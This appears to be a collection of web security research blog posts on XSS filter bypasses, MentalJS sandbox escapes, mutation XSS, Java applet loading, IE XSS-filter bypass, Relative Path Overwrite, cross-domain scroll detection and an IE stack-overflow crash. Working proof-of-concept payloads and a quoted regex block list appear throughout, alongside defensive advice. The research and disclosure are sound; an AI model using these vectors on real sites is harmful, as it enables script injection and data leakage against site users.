Unbreakable filter

I was bored so I thought I’d take a look at Ashar’s filters. I noticed he’d done a talk about it at Blackhat Europe which I was quite surprised at. Then I came across the following blog post about the talk which I pretty much agreed with. That blog post links to his filters so you can try them out yourself.

The first one is basically multiple JavaScript regexes which are far too generic to be of any value. For example “hahasrchaha” is considered a valid attack =) because it has “src” in. I’m not joking. The regexes are below.


function test(string) {
var match = /]*>[\s\S]*?/i.test(string) ||
/[\s"\'`;\/0-9\=\x0B\x09\x0C\x3B\x2C\x28]+on\w+[\s\x0B\x09\x0C\x3B\x2C\x28]*=/i.test(string) ||
/(?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/i.test(string) ||
/%[\d\w]{2}/i.test(string) ||
/&#[^&]{2}/i.test(string) ||
/&#x[^&]{3}/i.test(string) ||
/:/i.test(string) ||
/[\s\S]src[\s\S]/i.test(string) ||
/[\s\S]data:text\/html[\s\S]/i.test(string) ||
/[\s\S]xlink:href[\s\S]/i.test(string) ||
/[\s\S]base64[\s\S]/i.test(string) ||
/[\s\S]xmlns[\s\S]/i.test(string) ||
/[\s\S]xhtml[\s\S]/i.test(string) ||
/[\s\S]href[\s\S]/i.test(string) ||
/[\s\S]style[\s\S]/i.test(string) ||
/[\s\S]formaction[\s\S]/i.test(string) ||
/[\s\S]@import[\s\S]/i.test(string) ||
/[\s\S]!ENTITY.*?SYSTEM[\s\S]/i.test(string) ||
/[\s\S]pattern(?=.*?=)[\s\S]/i.test(string) ||
/
]*>[\s\S]*?/i.test(string) ||
/]*>[\s\S]*?/i.test(string) ||
/]*>[\s\S]*?/i.test(string) ||
/
]*>[\s\S]*?/i.test(string) ||
/]*>[\s\S]*?/i.test(string) ||
/]*>?[\s\S]*?/i.test(string) ||
/]*>?[\s\S]*?/i.test(string);
return match ? 'Filter has catch your awesome vector ... Try hard :(' : 'Bypass :)';
}

Because the filter is so bad it makes it fun to find a vector. The following vector will bypass the rule:


<button form=x>xss<form id=x action="javas&Tab;cript:alert(1)"

Other examples are:-

@\import
javas&NewLine;cript:alert(1)

Ashar also claimed his new filter was "unbreakable". There wasn't a lot of code but still it was badly broken. Let's talk a look at that code

function attributeContextCleaner($input) {
$bad_chars = array("\"", "'", "``");
$safe_chars = array("&quot;", "&apos;", "&grave;");
$output = str_replace($bad_chars, $safe_chars, $input);
return stripslashes($output);
}

Can you see it? Yeah he uses "``" instead of "`" so the code will look for two "`" rather than one but still that is not all. He uses stripslashes too for some random reason and we can use that to bypass the XSS Filter in IE. Not only does this code contain a glaring hole that it's supposed to protect against but it also enables the XSS vector to function.


<?php
function attributeContextCleaner($input) {
$bad_chars = array("\"", "'", "``");
$safe_chars = array("&quot;", "&apos;", "&grave;");
$output = str_replace($bad_chars, $safe_chars, $input);
return stripslashes($output);
}
?>
<img title=`<?php echo attributeContextCleaner($_GET['x'])?>` />

The vector to bypass the function and the XSS filter is:-

?x=`src=1 \0\0\0\0onerror=`alert(1)`

Stripslashes in PHP kindly removes all \0 for us which enables us to bypass the filter. This obviously only works in compat mode where "`" is an allowed attribute quote. In conclusion I don't recommend using any of the filters. Try mario's instead.

MentalJS bypasses

I managed to find time to fix a couple of MentalJS bypasses by LeverOne and Soroush Dalili (@irsdl). LeverOne’s vector was outstanding since it bypassed the parsing itself which is no easy task. The vector was as follows:


for(var i
i/'/+alert(location);0)break//')

Basically my parser was inserting a semi colon in the wrong place causing a different state than the actual state executed. My fix inserts the semi colon in the correct place. Before the fix the rewritten code looked like this:


for (var i$i$; / '/+alert(location);0)break//')

As you can see the variables have been incorrectly joined and so the next state is a regex whereas Mental thinks it’s a divide. After the fix the rewritten code looks like this:


for (var i$;i$ / '/+alert(location);0)break//')

So now the divide is an actual divide. Technically I shouldn’t be inserting a semi-colon in the for statement, I might fix this at a later stage if I have time.

The second bypass was from Soroush that basically assigned innerHTML on script nodes bypassing the rewriting completely. Cool bug. The fix was pretty simple, I prevented innerHTML assignments on script nodes. Here is the bypass:-


parent=document.getElementsByTagName('body')[0];
img=document.getElementsByTagName('img')[0];
x=document.createElement('script');
x.innerHTML='alert(location)';
parent.appendChild(x);

mXSS

Mutation XSS was coined by me and Mario Heiderich to describe an XSS vector that is mutated from a safe state into an unsafe unfiltered state. The most common form of mXSS is from incorrect reads of innerHTML. A good example of mXSS was discovered by Mario where the listing element mutated its contents to execute XSS.

<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>

When the listing’s innerHTML is read it is transformed into an image element even though the initial HTML is escaped. The following code example shows how the entities are decoded.

<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
<script>alert(document.getElementById('x').innerHTML)</script>

The expected result of the alert would be “&lt;img src=1 onerror=alert(1)&gt;” however IE10 decodes the entities and returns “<img src=1 onerror=alert(1)>” instead. The vector mutated from a safe state to an unexpected unsafe state. mXSS can work on multiple reads of the data, the first render is the actual HTML and every read of innerHTML is counted as another mutation since it could be decoded multiple times.
To help testing for mutation vectors I’ve created a simple tool that mutates the HTTML multiple levels. It does this by reading and writing the HTML. The tool is available here:

mXSS tool

If you try the above vector using this tool you can see how the vector mutates and executes. Because mutation XSS works on multiple levels the following HTML will be perfectly valid if you change the mutation level to 2. This reads and writes the HTML twice, you can of course increase the mutation value and continue encoding forever.

<listing>&amp;lt;img src=1 onerror=alert(1)&gt;</listing>

HTML parsers often get confused and understandably because of the complex interaction between HTML, entities and different document types. One of those confusions happens with HTML and XHTML. In IE9 document mode the entities will be decoded by confusing the parser that it’s a XHTML element rather than a HTML element. Visit the mXSS tool in IE9 mode at the following URL

mXSS tool in IE9 mode

By using a forward slash which is ignored in HTML but in XHTML it’s treated as a self-closing element we confuse the HTML parser into rendering the entities and breaking out of the style element and executing an image element. This bug was fixed in IE10 but thanks to the useful backwards compatibility modes we can render using IE9 and still execute.

<style/>&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;</style>

More elements work this way in IE9, the following Shazzer URL shows which elements decode entities in this way.

Incorrect innerHTML serialization

Another cool IE9 mutation vector is using the “<%” element, this element acts as a comment and it’s possible to mutate attributes inside other elements combining a script based vector. An example is below.


<script>
x="<%";
</script>
<div title="%&gt;&lt;/script&gt;&quot;&lt;img src=1 onerror=alert(1)&gt;"></div>

Java Serialization

In this post I will explore Java serialized applets and how they can be used for XSS. A serialized applet contains code that can be easily stored and loaded. Java supports an attribute called “object” which accepts a url to a serialized class file this allows us to load applets of our choosing provided they can be serialized and implements the java.io.Serializable interface. This feature is very old and obscure and I have successfully used the technique to bypass filters that look for very specific XSS patterns.

In order to create a serializable Java applet you need the following code (You also need to add plugin.jar to the class path):

import java.applet.*;
import netscape.javascript.*;

public class XSS extends Applet implements java.io.Serializable {
public void init() {
JSObject win = (JSObject) JSObject.getWindow(this);
win.eval("alert(1);");
}
}

The plugin.jar has to be in your class path to compile as a serialized object with the JavaScript interpreter to call eval from inside the applet. When you have successfully compiled the serialized applet you can call it using the object attribute like so.

<applet object="xss.ser" codebase="http://any url here containing the class and serialized data"></applet>

Use code base to give the path to the serialized object and object to point to the filename. This isn’t the only method to include a serialized applet. The Java plugin in IE supports many ways to point to a serialized file. I can also use param elements to specify the object reference like the following:

<applet><param name=codebase value=http://someurl><param name=object value=xss.ser></applet>

Unbelievably the plugin supports a “java_” prefix in all attribute names. So the following is a valid request to a serialized file.

<applet java_codebase=http://someurl java_object=xss.ser></applet>

You can even use param elements to do the same thing. Like the following

<applet><param name=java_codebase value=http://someurl><param name=java_object value=xss.ser></applet>

Finally away from serialization there is another trick to embed a class file using the embed element.

<embed type=application/x-java-applet codebase=http://someurl code=xss.class MAYSCRIPT width=500 height=500></embed>

This also works with Flash and you don’t even need to specify the type attribute just the code attribute. This works on webkit.

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

Bypassing the XSS filter using function reassignment

The XSS filter introduced in IE8 is a really powerful defence against XSS. I tested the filter for a number of years and found various bypasses one of which I would like to share with you now. You can read more about the filter and its goal in the following blog post.

Scope

There have been numerous public bypasses of the filter however very few within the intended scope of the filter. The filter blocks reflected XSS in HTML context, script, style and event context. It does not support attacks that use multiple parameters or same origin requests. Once you are aware of the intended scope the difficulty of bypassing the filter is very high.

Function reassignment

This bypass was fixed in later versions of Internet Explorer but still works in compatibility mode. You can use the vector in a penetration test by forcing the target site into compatibility mode using an iframe with an EmulateIE7 meta element as shown below.

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

This loads IE in emulate mode and the entire JavaScript engine will revert to an older mode enabling the vector to function. We need to setup a page with the target input inside a function argument in order to demonstrate the bypass. As you can see below the parameter “x” appears inside a string which calls the function “x”.


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script>
function x() {

}
<?php
$x = isset($_GET['x']) ? $_GET['x'] : '';
?>
x('<?php echo $x?>');
</script>

In older versions of Internet Explorer it’s possible to redefine a function within its calling arguments. This is very useful for bypassing the filter when your XSS hole executes within a function argument. To see how this works we pass a GET request to “x” within a payload that redefines the function “x” to alert and uses an argument before our break out string to pass to the function. The GET request looks like this:
somepage.php?x=1′,x=alert,’

The output of the page now looks like this:

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script>
function x() {

}
x('1',x=alert,'');
</script>

“1” is inserted at the start of the argument then we break out of the string and redefine the function “x” to alert then finish up by completing the string. The alert function only accepts 1 argument so our other arguments are ignored and alert(1) executes successfully.

Conclusion

As mentioned previously this vector was patched in later versions of IE however it will still work where a target site is in compatibility mode or you can force it into the older mode using iframes. The newer JavaScript engines in IE will not allow you to redefine functions within arguments. To protect against this vector you can force your site into standards mode by specifying a doctype or using the X-UA-Compatible header or meta element in edge mode. Preventing your site from being framed is also a good idea using the X-Frames-Option header and of course fixing the actual XSS hole in the first place is preferred.

RPO

Relative VS Absolute

RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.

Absolute URL

https://hackvertor.co.uk/public

Relative URL
public/somedirectory

The relative URL shown will look for public and automatically include the domain before it based on the current domain name. There are two important variations of a relative URL, the first is we can use the current path and look for a directory within it such as “xyz” or use common directory traversal techniques such as “../xyz”. To see how these work within markup let’s take a look at a common relative URL used within a stylesheet.


<html>
<head>
<link href="styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
</body>
</html>

The link element above references “style.css” using a relative URL, depending where in the sites directory structure you are it will load the style sheet based on that. For example if you were in a directory called “xyz” then the style sheet would be loaded from “xyz/style.css”.
The interesting aspect of this is how the browser knows what a correct path is since it doesn’t have access to the server’s file system. The answer is it doesn’t. There is no way to determine a valid directory structure from outside the file system you can only make educated guesses and use http status codes to determine their existence.

The missing styles

I noticed something interesting with relative styles, manipulating the path of the site could result in styles failing to load. It occurred to me this was a flaw in some way but the pieces of the jigsaw didn’t make sense yet. How could it be exploited?

Normal site

Relative url manipulated

The two screenshots above show a site without manipulating with URL the styles load as expected however in the second screenshot the same site is loaded with an added forward slash and the relative style sheet does not load. Simply adding a forward slash at the end of the URL breaks the styles of the relative style. Looking in Firebug we can see the style wdn.css returns a 404 when we add the forward slash.

Relative urls returning 404

The screenshot shows the style sheet returning a 404 for a style that previously loaded fine without manipulating the path. If the style returns 404 maybe we can manipulate the relative URL further by changing the path. This is in essence what RPO is about, we try to change the relative URL to something we control although this post is about XSS it’s worth noting that manipulating relative URLs can be done for any such URL and isn’t restricted to XSS.

Quick CSS lesson

Since we are looking at manipulating a style sheet to something we control we must first understand CSS parsing in order to take advantage of it. There is an interesting piece of the CSS 2 specification that we are very interested in.
“In some cases, user agents must ignore part of an illegal style sheet. This specification defines ignore to mean that the user agent parses the illegal part (in order to find its beginning and end), but otherwise acts as if it had not been there.” CSS 2 specification.
Another piece of the jigsaw is added, CSS2 ignores illegal syntax which we can use by supplying a file that contains mixed content of CSS and something else. If we can fool the CSS parsing into ignoring the illegal syntax before our intended code we can get the CSS parser to load our code. CSS selectors offer the best way to do this since an invalid selector can be ignored and all the previous illegal syntax.

Invalid code

}*{color:#ccc;}

There are two tricks to ignore illegal code both involve selectors, depending on the CSS parser a single } will work or {}. We shall look at IE compat since the parser is quite loose and supports CSS expressions. A CSS expression looks like the following:


*{
xss:expression(alert(1));
}

The first part is a global selector “*” and the { opens the selector a custom property xss is used and then the expression contains JavaScript that executes alert(1).

Self-referencing

If we can make the style sheet self-reference for the page it’s on then we can use the CSS parsing to ignore the HTML and execute our custom CSS in IE compat. When a site includes a style sheet like the following:


<link href="styles.css" rel="stylesheet" type="text/css" />

We simply need to include a forward slash at the end of the URL and the style sheet will end up (if rewriting is available) loading the original page via what the browser thinks is a directory but is in fact the current page. E.g somepage.php/. Now that our style sheet is loading the web page we need to supply it with some CSS to execute, we can do this by mixing persistent data such as a first name or address think of this as both a reflective attack and a persistent attack but the persistent data contains CSS code.
To understand this it’s better to show the actual structure of the page and you to see the vector itself. Imagine we have a web page with some data we control such as “first name” the web page would look like the following.


<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link href="styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Hello {}*{xss:expression(open(alert(1)))}
</body>
</html>

PoC (IE ONLY): RPO example

The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert. A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.

Further RPO attacks

You might wonder if the RPO attack is restricted to just relative URLs like “styles.css” the answer is no, it’s possible to attack URLs such as “../../styles.css” but in this case we need to provide levels of fake directories until the styles are loaded from the current document. “../” means look above the current directory; we need three levels of fake directories.


<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link href="../../styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Hello {}*{xss:expression(open(alert(1)))}
</body>
</html>

PoC: RPO example 2

This time because the relative URL is looking for a directory twice above the current directory we make a request of “/labs/xss_horror_show/chapter7/rpo2.php/styles.css” this means that you could also target a file in a different directory but in this case we pointed it back to the original html file. Note we could have done just rpo2.php/// but I provided the text of fake directory for clarity.
There are other variants such as using the @import command which is useful if length or characters are limited. Using the “}” to ignore the HTML again followed by an @import statement works perfectly fine on IE even though technically it’s invalid syntax to use an import statement in this way.
RPO isn’t restricted to IE, we can use the technique on other browsers but JavaScript isn’t supported in CSS on Chrome, Firefox, Opera or Safari. Another restriction is that a doctype cannot be included on the target document since this causes the CSS’s parsers to stop parsing the HTML file on non-IE browsers.


<html>
<head>
<link href="../../styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Hello {}*{color:#ccc;}
</body>
</html>

PoC: RPO example 3

The document above changes the colour of the text to grey and works on every browser. It works in the same way as the previous PoC but this time uses pure CSS and no expressions. If a doctype was included in the document it would fail on every browser except if IE was in compat mode.
RPO attacks work on any type of document, it’s possible to change the target of image files for example but because the image files look for specific strings at the start of the file and the end result is only an image it makes RPO attacks less useful in these circumstances.

Reflected RPO

If the URL is outputted on the page we can send the XSS vector via the path. The following PHP example shows the URL being outputted on the page.


<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link href="styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Hello <?php echo $_SERVER['PHP_SELF']?>
</body>
</html>

There is a relative URL here and “echo $_SERVER[‘PHP_SELF’]” outputs the current URL of the page requested. We can exploit this by providing some CSS as part of the path since the relative URL will be loaded with our injection and then the CSS will be loaded from the HTML. On some configurations PHP_SELF will truncate the path information, in this instance PATH_INFO can be used.
PoC: RPO example 4

Summary

I consider relative URLs harmful since you cannot rely on the browser to correctly determine the correct directory and when used with so called “pretty URLs”. Pretty much everyone who has used relative URLs will be open to this type of attack if the path information is outputted or there is some persistent data that an attacker can manipulate. I recommend absolute URLs should be used throughout a site or relative URLs that begin with a forward slash since this is the only type of relative URL that isn’t vulnerable to a RPO attack because it starts at the document root.

Update..

It’s worth noting that a relative root url isn’t vulnerable to this sort of attack since the directory is take from the highest point in the structure and I think can’t be influenced the way a normal relative url can.

Sandboxed jQuery

My new personal challenge was to get jQuery working correctly in a sandboxed environment this proved to be really tricky. The first problem I encountered was my fake DOM environment wasn’t returning the correct value for nodeType on the document element, this made jQuery assume another state and breaking selectors. I ensured the DOM environment was correctly returning the node type & node name. Next my environment wasn’t returning Array.prototype.push and slice correctly, the functions I created was incorrectly returning false. I changed my object whitelist function to return the prototypes correctly.

I then got a strange error, push.apply is not writable I traced this down in the jQuery code and it seems I was making properties non-writable when rewriting arrays, in addition the length property wasn’t being written since it was referenced as length$ because it was sandboxed. The fix was to shadow the length property by creating a getter/setter on the rewritten object literals so calls to length$ where also update length of the object literal. Basically sizzle calls a push on a object and because it didn’t have a length property it wouldn’t work but now it’s shadowed it works fine.

You can see a small demo of sandboxed jQuery here.

X-Domain scroll detection on IE using focus

This is a pretty cool bug. I use the focus event on an iframe to detect if the iframe has been scrolled x-domain. It’s because IE fires the onfocus event of the iframe when the scroll occurs. This means using 1 network request we can discover if a site contains a particular id provided the page scrolls inside the iframe. Using multiple iframes you could quite easily bruteforce larger numbers or maybe a dictionary list of words and because we are using hash the future requests aren’t sent to the server.

First we need a page with an id we can scroll to.

<p>test</p>
<p>test</p>
<p>test</p>
<p>test</p>
<p>test</p>
<div id=1337>target</div>

When visiting this page it should jump to #1337 provided the window is small enough.

Next we create an iframe and attach an onfocus event:

<iframe src="http://hackvertor.co.uk/scroll/test.html" id="x" onfocus="alert('the iframe scrolled to: '+window.id);clearTimeout(timer)" name="x"></iframe>

Now we need to create the clicks to trigger the onfocus event and produce the scroll.


id=0;
var anchor = document.createElement('a');
anchor.target="x";
document.body.appendChild(anchor);

timer=setTimeout(function f(){
id++;
document.getElementById('pos').innerText = id;
anchor.href='http://hackvertor.co.uk/scroll/test.html#'+id;
anchor.click();
if(id<10000) {
timer=setTimeout(f,0);
}
},0)

The code keeps calling itself until 10,000 iterations or until the onfocus event fires and clears the timeout. Which it does on IE with 1337 :)

PoC

Epic fail IE

gaz:
omg more epic fail in IE :D

larry:
huh? :D

gaz:
what is “&#x0000041;” in IE compat?

larry:
hm A?

gaz:
no

larry:
?

gaz:
lol
?

larry:
NUL
?

gaz:
&#x0000041; –> ?
&#x000041; –> A

larry:
ah!
out of bounds
I get it

gaz:
what is this in IE compat: &#x41

larry:
:-h
A?

gaz:
no
lol
&#x41 –> &#x41

larry:
#!$% me!
:D
why??

gaz:
hahahhaha
what is &#x41 in standards?

larry:
A
?

gaz:
yeah haha

larry:
weeee

gaz:
how messed up is that? :D

larry:
entirely
as usual
:)

new operator

I was playing around with new operators when I noticed something cool and unexpected. If you return a function the new operator will not create a new object instance but instead return a function. This means that stuff like:

new new new new new new function f(){return f}

Is perfectly valid code. That made me think maybe it would cause a crash. Yep course it does on IE:
eval(Array(0xffff).join('new ')+'function f(){return f}')

ModLoad: 00000000`70af0000 00000000`70ba5000 C:\Windows\SysWOW64\MsSpellCheckingFacility.dll
ModLoad: 00000000`69a40000 00000000`69a8f000 C:\Windows\SysWOW64\Bcp47Langs.dll
ModLoad: 00000000`74cd0000 00000000`74cd3000 C:\WINDOWS\SysWOW64\Normaliz.dll
(1778.173c): C++ EH exception – code e06d7363 (first chance)
(1778.173c): Stack overflow – code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
JSCRIPT9!Scanner::Scan+0×8:
70e69742 53 push ebx

Just a stack overflow, I don’t think it’s exploitable but lets try and manipulate it further. Using unicode escapes changes the code slightly:

eval(Array(0xffff).join('\\u006e\u0065w ')+'function f(){return f}')

msvcrt!memcmp+0xc:
7506985c 56 push esi

I then thought about using different types of spaces and fuzzed them but had no success producing any form of exploitable crash, maybe you can?